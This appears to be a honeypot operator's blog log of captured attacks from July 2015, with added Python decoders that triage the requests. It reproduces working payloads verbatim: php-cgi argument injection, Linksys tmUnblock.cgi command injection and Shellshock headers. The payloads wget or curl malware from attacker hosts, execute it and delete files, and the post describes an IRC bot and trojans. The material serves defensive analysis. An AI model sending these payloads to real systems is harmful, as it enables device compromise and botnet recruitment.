f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%6e HTTP/1.1
Host: -h
Content-Type: application/x-www-form-urlencoded
Content-Length: 188

<? system("cd /tmp ; wget trying.us.to/seed.jpg ; curl -O http://trying.us.to/seed.jpg ; fetch http://trying.us.to/seed.jpg ; tar -xzvf seed.jpg ; chmod +x seed ; ./seed  ; rm -rf * "); ?>
 END OF DATA
 This is a really, really nice one.
The seed.jpg is basically just a script that downloads the actual payload:
#!/bin/bash
cd /var/tmp/ ;wget trying.us.to/index.htm; curl -O http://trying.us.to/index.htm; fetch http://trying.us.to/index.htm; tar -xzvf index.htm;rm -rf index.htm; perl /var/tmp/libssl3.so.2 ; rm -rf *; wget trying.us.to/stats.php;fetch http://trying.us.to/stats.php ;curl -O http://trying.us.to/stats.php; tar -xzvf stats.php ; rm -rf stats.php ; cd .d ;./autorun
This script leads to the download of two files, index.htm and stats.php. Both are gzipped tar archives.
  • index.htm is an IRC bot; the name of the unpacked file is libssl3.so.2
  • The second file, stats.php, is the nicer one:
    it unpacks a full folder structure into .d

    The file bang.txt in there contains a list of more than 15,000 IP addresses
I uploaded all files to my Google Drive:
the password is "danger"


Encoded NTTPD attack from 110.170.205.51

2015-07-19 05:17:46
Source IP: 110.170.205.51
Country: TH RiskScore: 2.9 Malware: []
POST /tmUnblock.cgi HTTP/1.1
content-length: 946

%73%75%62%6d%69%74%5f%62%75%74%74%6f%6e%3d&%63%68%61%6e%67%65%5f%61%63%74%69%6f%6e%3d&%61%63%74%69%6f%6e%3d&%63%6f%6d%6d%69%74%3d&%74%74%63%70%5f%6e%75%6d%3d%32&%74%74%63%70%5f%73%69%7a%65%3d%32&%74%74%63%70%5f%69%70%3d%2d%68%20%60%63%64%20%2f%74%6d%70%3b%65%63%68%6f%20%22%23%21%2f%62%69%6e%2f%73%68%22%20%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%65%63%68%6f%20%22%72%6d%20%2d%66%20%2e%6e%74%74%70%64%22%20%3e%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%65%63%68%6f%20%22%77%67%65%74%20%2d%4f%20%2e%6e%74%74%70%64%20%68%74%74%70%3a%2f%2f%31%31%30%2e%31%37%30%2e%32%30%35%2e%35%31%3a%33%33%34%34%22%20%3e%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%65%63%68%6f%20%22%63%68%6d%6f%64%20%2b%78%20%2e%6e%74%74%70%64%22%20%3e%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%65%63%68%6f%20%22%2e%2f%2e%6e%74%74%70%64%22%20%3e%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%63%68%6d%6f%64%20%2b%78%20%2e%6e%74%74%70%64%2e%73%68%3b%2e%2f%2e%6e%74%74%70%64%2e%73%68%60&%53%74%61%72%74%45%50%49%3d%31
 END OF DATA
The body decodes to:
 submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `cd /tmp;echo "#!/bin/sh" > .nttpd.sh;echo "rm -f .nttpd" >> .nttpd.sh;echo "wget -O .nttpd http://110.170.205.51:3344" >> .nttpd.sh;echo "chmod +x .nttpd" >> .nttpd.sh;echo "./.nttpd" >> .nttpd.sh;chmod +x .nttpd.sh;./.nttpd.sh`&StartEPI=1

So basically the same as yesterday. Again the software is not downloadable.
But this time we have a RiskScore (2.9) reported by IBM X-Force Exchange:

{
   "categoryDescriptions": {
      "Spam": "This category lists IP addresses that were seen sending out spam."
   },
   "cats": {
      "Spam": 29
   },
   "geo": {
      "country": "Thailand",
      "countrycode": "TH"
   },
   "ip": "110.170.205.51",
   "reason": "Spam sending activity",
   "reasonDescription": "This IP was involved in spam sending activities.",
   "score": 2.9,
   "subnets": [
      {
         "categoryDescriptions": {},
         "cats": {},
         "created": "2012-03-22T07:26:00.000Z",
         "geo": {
            "country": "Thailand",
            "countrycode": "TH"
         },
 

Freitag, 17. Juli 2015

Encoded NTTPD attack from 149.129.69.111

Earlier today my honeypot (the new version, by the way) received an encoded attack:

2015-07-17 19:04:14
Source IP: 149.129.69.111
Country: MY RiskScore: 1 Malware: []
POST /tmUnblock.cgi HTTP/1.1
content-length: 946

%73%75%62%6d%69%74%5f%62%75%74%74%6f%6e%3d&%63%68%61%6e%67%65%5f%61%63%74%69%6f%6e%3d&%61%63%74%69%6f%6e%3d&%63%6f%6d%6d%69%74%3d&%74%74%63%70%5f%6e%75%6d%3d%32&%74%74%63%70%5f%73%69%7a%65%3d%32&%74%74%63%70%5f%69%70%3d%2d%68%20%60%63%64%20%2f%74%6d%70%3b%65%63%68%6f%20%22%23%21%2f%62%69%6e%2f%73%68%22%20%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%65%63%68%6f%20%22%72%6d%20%2d%66%20%2e%6e%74%74%70%64%22%20%3e%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%65%63%68%6f%20%22%77%67%65%74%20%2d%4f%20%2e%6e%74%74%70%64%20%68%74%74%70%3a%2f%2f%31%34%39%2e%31%32%39%2e%36%39%2e%31%31%31%3a%33%33%34%34%22%20%3e%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%65%63%68%6f%20%22%63%68%6d%6f%64%20%2b%78%20%2e%6e%74%74%70%64%22%20%3e%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%65%63%68%6f%20%22%2e%2f%2e%6e%74%74%70%64%22%20%3e%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%63%68%6d%6f%64%20%2b%78%20%2e%6e%74%74%70%64%2e%73%68%3b%2e%2f%2e%6e%74%74%70%64%2e%73%68%60&%53%74%61%72%74%45%50%49%3d%31
The encoded string decodes to:
 submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `cd /tmp;echo "#!/bin/sh" > .nttpd.sh;echo "rm -f .nttpd" >> .nttpd.sh;echo "wget -O .nttpd http://149.129.69.111:3344" >> .nttpd.sh;echo "chmod +x .nttpd" >> .nttpd.sh;echo "./.nttpd" >> .nttpd.sh;chmod +x .nttpd.sh;./.nttpd.sh`&StartEPI=1

 The software can't be downloaded currently, as the IP address is not responding. My best guess is that the attack tried to install an open-directory web server.
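As an added example (my code, not the blog's) covering the NTTPD posts of Jul 17, 19 and 27: the form body is fully percent-encoded, the "=" between field name and value included, which defeats a generic query-string parser and any rule keyed on the literal text "ttcp_ip=". The decoder below handles that, pulls the backtick command substitution out of ttcp_ip, replays the echo lines into the dropper script the command writes to /tmp, and extracts the download URL. The sample is the body from this post, split per form field with the decoded value as comment.

```python
"""Decode a tmUnblock.cgi command-injection body and recover the stager.

Added example, not code from the blog. The NTTPD posts (Jul 17, 19 and 27)
carry the same fully percent-encoded form body aimed at the Linksys
tmUnblock.cgi endpoint; this decodes it field by field, extracts the shell
command smuggled into ttcp_ip, rebuilds the dropper it writes and lists the
download URL. The sample below is the Jul 17 body.
"""
from __future__ import annotations

import re
from urllib.parse import parse_qsl, unquote

# Constructed sample: the Jul 17 body, one form field (or dropper line) per chunk.
SAMPLE_BODY = (
    "%73%75%62%6d%69%74%5f%62%75%74%74%6f%6e%3d"                                   # submit_button=
    "&%63%68%61%6e%67%65%5f%61%63%74%69%6f%6e%3d"                                  # &change_action=
    "&%61%63%74%69%6f%6e%3d"                                                       # &action=
    "&%63%6f%6d%6d%69%74%3d"                                                       # &commit=
    "&%74%74%63%70%5f%6e%75%6d%3d%32"                                              # &ttcp_num=2
    "&%74%74%63%70%5f%73%69%7a%65%3d%32"                                           # &ttcp_size=2
    "&%74%74%63%70%5f%69%70%3d%2d%68%20%60"                                        # &ttcp_ip=-h `
    "%63%64%20%2f%74%6d%70%3b"                                                     # cd /tmp;
    "%65%63%68%6f%20%22%23%21%2f%62%69%6e%2f%73%68%22%20%3e%20%2e%6e%74%74%70%64%2e%73%68%3b"  # echo "#!/bin/sh" > .nttpd.sh;
    "%65%63%68%6f%20%22%72%6d%20%2d%66%20%2e%6e%74%74%70%64%22%20%3e%3e%20%2e%6e%74%74%70%64%2e%73%68%3b"  # echo "rm -f .nttpd" >> .nttpd.sh;
    "%65%63%68%6f%20%22%77%67%65%74%20%2d%4f%20%2e%6e%74%74%70%64%20%68%74%74%70%3a%2f%2f"
    "%31%34%39%2e%31%32%39%2e%36%39%2e%31%31%31%3a%33%33%34%34%22%20%3e%3e%20%2e%6e%74%74%70%64%2e%73%68%3b"  # echo "wget -O .nttpd http://149.129.69.111:3344" >> .nttpd.sh;
    "%65%63%68%6f%20%22%63%68%6d%6f%64%20%2b%78%20%2e%6e%74%74%70%64%22%20%3e%3e%20%2e%6e%74%74%70%64%2e%73%68%3b"  # echo "chmod +x .nttpd" >> .nttpd.sh;
    "%65%63%68%6f%20%22%2e%2f%2e%6e%74%74%70%64%22%20%3e%3e%20%2e%6e%74%74%70%64%2e%73%68%3b"  # echo "./.nttpd" >> .nttpd.sh;
    "%63%68%6d%6f%64%20%2b%78%20%2e%6e%74%74%70%64%2e%73%68%3b"                    # chmod +x .nttpd.sh;
    "%2e%2f%2e%6e%74%74%70%64%2e%73%68%60"                                         # ./.nttpd.sh`
    "&%53%74%61%72%74%45%50%49%3d%31"                                              # &StartEPI=1
)

BACKTICKS = re.compile(r"`([^`]*)`")
ECHO_REDIRECT = re.compile(r'^echo "(.*)" (>>?) (\S+)$')
URL_RE = re.compile(r"https?://[^\s\"'`;]+")


def decode_form(body: str) -> dict[str, str]:
    """Decode a form body in which every byte, '=' included, is percent-encoded.

    parse_qsl() splits name from value on a literal '=' before decoding, so
    with '=' sent as %3d it yields nameless fields; decode each pair first.
    """
    fields: dict[str, str] = {}
    for pair in body.split("&"):
        if pair:
            name, _, value = unquote(pair).partition("=")
            fields[name] = value
    return fields


def generic_parser_sees(body: str, name: str) -> bool:
    """Whether urllib's parse_qsl recognises `name` as a field in this body."""
    return name in dict(parse_qsl(body, keep_blank_values=True))


def injected_command(fields: dict[str, str], param: str = "ttcp_ip") -> str | None:
    """Return the command substituted into `param`, or None if there is none."""
    m = BACKTICKS.search(fields.get(param, ""))
    return m.group(1) if m else None


def rebuild_dropper(command: str) -> tuple[dict[str, list[str]], list[str]]:
    """Replay `echo "line" > file` / `>> file` statements into per-file scripts.

    Returns ({file: lines}, other_statements). Only the plain form this bot
    family uses is handled; everything else is kept verbatim in the list.
    """
    scripts: dict[str, list[str]] = {}
    others: list[str] = []
    for stmt in (s.strip() for s in command.split(";")):
        if not stmt:
            continue
        m = ECHO_REDIRECT.match(stmt)
        if not m:
            others.append(stmt)
            continue
        line, op, path = m.groups()
        if op == ">":                        # truncating redirect starts the file over
            scripts[path] = []
        scripts.setdefault(path, []).append(line)
    return scripts, others


def analyse(body: str) -> dict:
    """Full triage record for one captured tmUnblock.cgi POST body."""
    fields = decode_form(body)
    command = injected_command(fields)
    scripts, others = rebuild_dropper(command or "")
    text = " ".join(line for lines in scripts.values() for line in lines)
    return {"fields": fields, "command": command, "scripts": scripts,
            "other_statements": others, "download_urls": sorted(set(URL_RE.findall(text)))}


if __name__ == "__main__":
    for k, v in analyse(SAMPLE_BODY).items():
        print(k, v)
```

The download URL is the one artefact worth pivoting on: in all three posts it points back at the attacking host on port 3344, so a single source IP gives both the scanner and the distribution point.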

Montag, 13. Juli 2015

Multiple ChinaZ related attacks - 211.147.2.192

Yesterday my honeypot was hit by several ChinaZ-related attacks, delivered as Shellshock payloads (the "() { :; };" bash function definition in the request headers):

{"message":"Jul 13 06:38:52 localhost [mypyfwa] 2015-07-13 06:38:52.540616 211.147.2.192 - - [12/Jul/2015:20:48:02 +0200] \"GET / HTTP/1.1\" 404 442 \"() { :; }; /bin/bash -c \\\"rm -rf /tmp/*;echo wget http://211.147.2.192:911/1122.64 -O /tmp/China.Z-oxdn\\x18 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-oxdn\\x18 >> /tmp/Run.sh;echo /tmp/China.Z-oxdn\\x18 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\\\"\" \"() { :; }; /bin/bash -c \\\"rm -rf /tmp/*;echo wget http://211.147.2.192:911/1122.64 -O /tmp/China.Z-oxdn\\x18 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-oxdn\\x18 >> /tmp/Run.sh;echo /tmp/China.Z-oxdn\\x18 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\\\"\" 211.147.2.192 CN SHELLinjection","@version":"1","@timestamp":"2015-07-13T04:38:52.586Z","type":"syslog","file":"/var/log/smsids.log","host":"beeswarm","offset":"26328","tags":["_grokparsefailure"],"syslog_severity_code":5,"syslog_facility_code":1,"syslog_facility":"user-level","syslog_severity":"notice"}
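As an added example (my code, not the blog's), this Python pulls the Shellshock payload out of the logstash event above: it checks for the bash function-definition marker, extracts the /bin/bash -c command, its download URL and the dropper path, and reads the honeypot's own "<ip> <country> <label>" trailer at the end of the message. The sample event is the one shown above, copied verbatim.

```python
"""Extract the Shellshock payload from a logstash-style JSON event.

Added example, not code from the blog. The event wraps an Apache combined-log
line whose Referer and User-Agent fields both carry the "() { :; };" bash
function definition (CVE-2014-6271) followed by a /bin/bash -c command.
"""
from __future__ import annotations

import json
import re

SHELLSHOCK_MARKER = re.compile(r"\(\)\s*\{\s*:;\s*\};")
# In the decoded message the bash -c argument is delimited by \" : the access
# log escaped the inner quotes and logstash escaped those backslashes again.
BASH_C_PAYLOAD = re.compile(r'/bin/bash -c \\"(.*?)\\"')
URL_RE = re.compile(r"https?://[^\s\"'`;]+")

# The event from this post, copied verbatim (one line).
SAMPLE_EVENT = r'''{"message":"Jul 13 06:38:52 localhost [mypyfwa] 2015-07-13 06:38:52.540616 211.147.2.192 - - [12/Jul/2015:20:48:02 +0200] \"GET / HTTP/1.1\" 404 442 \"() { :; }; /bin/bash -c \\\"rm -rf /tmp/*;echo wget http://211.147.2.192:911/1122.64 -O /tmp/China.Z-oxdn\\x18 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-oxdn\\x18 >> /tmp/Run.sh;echo /tmp/China.Z-oxdn\\x18 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\\\"\" \"() { :; }; /bin/bash -c \\\"rm -rf /tmp/*;echo wget http://211.147.2.192:911/1122.64 -O /tmp/China.Z-oxdn\\x18 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-oxdn\\x18 >> /tmp/Run.sh;echo /tmp/China.Z-oxdn\\x18 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\\\"\" 211.147.2.192 CN SHELLinjection","@version":"1","@timestamp":"2015-07-13T04:38:52.586Z","type":"syslog","file":"/var/log/smsids.log","host":"beeswarm","offset":"26328","tags":["_grokparsefailure"],"syslog_severity_code":5,"syslog_facility_code":1,"syslog_facility":"user-level","syslog_severity":"notice"}'''


def shellshock_from_event(line: str) -> dict | None:
    """Return a triage record for a Shellshock event, or None if the marker is absent."""
    event = json.loads(line)
    msg = event["message"]
    markers = SHELLSHOCK_MARKER.findall(msg)
    if not markers:
        return None
    payloads = BASH_C_PAYLOAD.findall(msg)
    command = payloads[0] if payloads else ""
    statements = [s.strip() for s in command.split(";") if s.strip()]
    # Honeypot-specific trailer appended to the message: "<source ip> <country> <label>"
    _, source_ip, country, label = msg.rsplit(" ", 3)
    return {
        "timestamp": event["@timestamp"],
        "source_ip": source_ip,
        "country": country,
        "label": label,
        "marker_count": len(markers),            # 2 here: Referer and User-Agent
        "payload_count": len(payloads),
        "payloads_identical": len(set(payloads)) <= 1,
        "statements": statements,
        "download_urls": sorted(set(URL_RE.findall(command))),
        # the first ">> file" redirect names the dropper script the payload writes
        "dropper": next((s.rsplit(">>", 1)[1].strip() for s in statements if ">>" in s), None),
    }


if __name__ == "__main__":
    for k, v in shellshock_from_event(SAMPLE_EVENT).items():
        print(k, v)
```

The "\x18" inside the file name is a control byte the attacker appended to the dropper name; the access log escaped it as a four-character sequence, which is why a rule matching the literal name "China.Z-oxdn" would still work but a byte-exact match on the original request would not.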

All attacks originated from the same source IP, 211.147.2.192, which also serves the download (port 911):
"ip": "211.147.2.192",
   "subnets": [
      {
         "categoryDescriptions": {},
         "cats": {},
         "created": "2012-03-22T07:26:00.000Z",
         "geo": {
            "country": "China",
            "countrycode": "CN"
         },
There were three different files within the attacks (clamscan results):
  •  ./1122.32: Linux.Trojan.IptabLex FOUND
  • ./1122.64: Linux.Trojan.IptabLex FOUND
  • ./8uc: Unix.Trojan.DDoS_XOR-1 FOUND
pi@raspberrypi ~/ana $ file 1122.32
1122.32: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
pi@raspberrypi ~/ana $ file 1122.64
1122.64: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
pi@raspberrypi ~/ana $ file 8uc
8uc: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped

Samstag, 4. Juli 2015

Urlencoded attack by 198.154.63.131

 After some weeks with not much going on at the honeypot, I had a URL-encoded attack yesterday.
{"message":"Jul 4 06:41:57 localhost [mypyfwa] 2015-07-04 06:41:57.032661 POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1 198.154.63.131 US Length","@version":"1","@timestamp":"2015-07-04T04:41:57.587Z","type":"syslog","file":"/var/log/smsids.log","host":"beeswarm","offset":"12613","tags":["_grokparsefailure"],"syslog_severity_code":5,"syslog_facility_code":1,"syslog_facility":"user-level","syslog_severity":"notice"}

The URL decodes to

 cgi-bin/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-d+auto_prepend_file=php://input+-n
 This sort of attack is not that interesting, at least to me.
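As an added example (my code, not the blog's), the following Python triages this family of requests, which appears in the posts of Jul 4, 19, 23, 25 and 31: it decodes the target, recovers the -d INI overrides that php-cgi reads from the query string, flags the auto_prepend_file=php://input plus allow_url_include=on combination that makes the POST body execute, and pulls download hosts out of the body. The sample request uses the request line, headers and PHP body of the Jul 25 post; the CRLF framing is reconstructed.

```python
"""Triage a captured php-cgi argument-injection request.

Added example, not code from the blog. Decodes the percent-encoded target,
recovers the -d INI overrides php-cgi reads from the query string, flags the
combination that makes the POST body execute, and extracts download hosts
from the body.
"""
from __future__ import annotations

import re
from urllib.parse import unquote

# A CGI-aware server passes the query string to argv only when it contains no
# literal "=" (RFC 3875 4.4; abused as CVE-2012-1823), which is why every "="
# is percent-encoded. These two overrides turn the request body into executed PHP.
RCE_DIRECTIVES = {"auto_prepend_file": "php://input", "allow_url_include": "on"}

# host/path downloaders: "wget 1.2.3.4/x", "curl -O http://host/x"
URL_RE = re.compile(r"(?:https?://)?(?:[\w-]+\.)+[\w-]+(?::\d+)?/[^\s;\"')]+")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

# Constructed sample: request line, headers and PHP body of the Jul 25 post,
# joined with CRLF as on the wire (the framing is reconstructed).
SAMPLE_REQUEST = "\r\n".join([
    "POST /%70%68%70%70%61%74%68/%70%68%70"                                     # /phppath/php
    "?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E"      # -d allow_url_include=on
    "+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66"                           # -d safe_mode=off
    "+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E"   # -d suhosin.simulation=on
    "+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22"      # -d disable_functions=""
    "+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65"               # -d open_basedir=none
    "+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D"
    "%70%68%70%3A%2F%2F%69%6E%70%75%74"                                         # -d auto_prepend_file=php://input
    "+%2D%6E HTTP/1.1",                                                         # -n
    "Host: 195.169.125.87",
    "User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
    "Content-Type: application/x-www-form-urlencoded",
    "Content-Length: 204",
    "",
    r'<?php echo "Content-Type:text/html\r\n\r\n";echo "OK\n";system("wget '
    r'194.60.242.251/minispeedtest/speedtest/.z/hb/plk03 -O /tmp/.0e1bc.log;'
    r'perl /tmp/.0e1bc.log 188.165.44.137;rm -rf /tmp/.0e1bc.log;"); ?>',
])


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.x request into method, target, version, headers, body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}


def php_cgi_argv(target: str) -> tuple[str, dict[str, str], list[str]]:
    """Decode the target into (path, {-d directive: value}, other argv words).

    "+" separates the argv words and each word is percent-decoded afterwards,
    which is how the server builds the command line from an indexed query.
    """
    path, _, query = target.partition("?")
    words = [unquote(w) for w in query.split("+") if w]
    directives, others = {}, []
    i = 0
    while i < len(words):
        if words[i] == "-d" and i + 1 < len(words):
            key, _, value = words[i + 1].partition("=")
            directives[key] = value.strip('"')
            i += 2
        else:
            others.append(words[i])
            i += 1
    return unquote(path), directives, others


def is_php_cgi_rce(directives: dict[str, str]) -> bool:
    """True when the overrides make php-cgi execute the request body as PHP."""
    return all(directives.get(k, "").lower() == v for k, v in RCE_DIRECTIVES.items())


def extract_iocs(body: str) -> dict[str, list[str]]:
    """Download URLs (in order of appearance) and unique IPv4 addresses in a payload."""
    return {"urls": URL_RE.findall(body), "ips": sorted(set(IPV4_RE.findall(body)))}


def triage(raw_request: str) -> dict:
    """One record per request, ready for a log line or an alert."""
    req = parse_request(raw_request)
    path, directives, others = php_cgi_argv(req["target"])
    return {"method": req["method"], "headers": req["headers"], "path": path,
            "directives": directives, "flags": others,
            "rce": is_php_cgi_rce(directives), "iocs": extract_iocs(req["body"])}


if __name__ == "__main__":
    for k, v in triage(SAMPLE_REQUEST).items():
        print(k, v)
```

extract_iocs also copes with hostname downloaders such as the seed.jpg body of the Jul 19 post, where wget, curl and fetch are tried in turn against the same path; the first-seen URL is usually the one worth fetching for analysis while the host is still up.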
The attack was launched from the US by:

NetType:        Direct Allocation
OriginAS:       AS26272
Organization:   FortaTrust USA Corporation (FUC-9)
 
The IBM X-Force Exchange data shows:
{
   "cats": {},
   "geo": {
      "country": "United States",
      "countrycode": "US"
   },
   "ip": "198.154.63.131",
   "score": 1,
   "subnets": [
      {
         "cats": {},
         "created": "2012-09-15T06:28:00.000Z",
         "geo": {
            "country": "United States",
            "countrycode": "US"
         },
         "ip": "198.154.60.0",
         "reason": "Regional Internet Registry",
         "score": 1,
         "subnet": "198.154.60.0/22"
      }
   ]
}